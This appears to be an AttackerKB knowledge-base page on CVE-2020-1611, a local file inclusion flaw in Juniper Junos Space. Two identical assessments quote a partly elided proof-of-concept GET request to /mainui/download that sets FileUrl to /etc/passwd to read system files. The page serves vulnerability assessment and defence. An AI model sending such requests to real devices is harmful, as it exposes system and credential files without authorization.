AttackerKBAKB:23437D69-A42D-46BB-B507-61EE0448251FJunos Space: Malicious HTTP packets sent to Junos Space allow an attacker to view all files on the device.
EPSS
Percentile
26.4%
A Local File Inclusion vulnerability in Juniper Networks Junos Space allows an attacker to view all files on the target when the device receives malicious HTTP packets. This issue affects: Juniper Networks Junos Space versions prior to 19.4R1.
Recent assessments:
busterb at January 30, 2020 8:09am UTC reported:
This is a low-risk, high-gain vulnerability, exploiting a path inclusion (which is basically on the same impact as the Citrix ADC (Netscaler) path traversal bug). Though itβs probably less likely to find these sitting on the public internet.
PoC from Jin Wook Kim
@wugeej
<https://twitter.com/wugeej/status/1222762164626186242>
[PoC] Juniper Junos Space Local File Inclusion (CVE-2020-1611)
- GET Param:
(1) Set "Format" to "txt"
(2) Set "FileUrl" to a local path
- /ect/passwd
GET /mainui/download?X-CSRF=Y581SFvK....53107455361&FileUrl=/etc/passwd&Format=txt&nod... HTTP/1.1
rootOptional at March 09, 2020 7:43pm UTC reported:
This is a low-risk, high-gain vulnerability, exploiting a path inclusion (which is basically on the same impact as the Citrix ADC (Netscaler) path traversal bug). Though itβs probably less likely to find these sitting on the public internet.
PoC from Jin Wook Kim
@wugeej
<https://twitter.com/wugeej/status/1222762164626186242>
[PoC] Juniper Junos Space Local File Inclusion (CVE-2020-1611)
- GET Param:
(1) Set "Format" to "txt"
(2) Set "FileUrl" to a local path
- /ect/passwd
GET /mainui/download?X-CSRF=Y581SFvK....53107455361&FileUrl=/etc/passwd&Format=txt&nod... HTTP/1.1
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5
Related
